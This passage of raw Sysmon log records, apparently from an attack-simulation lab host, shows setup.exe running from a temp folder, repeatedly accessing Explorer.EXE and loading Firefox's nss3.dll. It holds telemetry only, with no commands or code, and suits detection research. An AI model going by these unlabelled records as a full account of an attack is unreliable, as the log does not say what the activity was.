l+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000015143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\nss3.dll2021-01-18 13:59:52.442 10341000x800000000000000015142Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015141Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015140Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015139Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015138Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015137Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015136Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015135Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015134Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015133Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015132Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.442{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
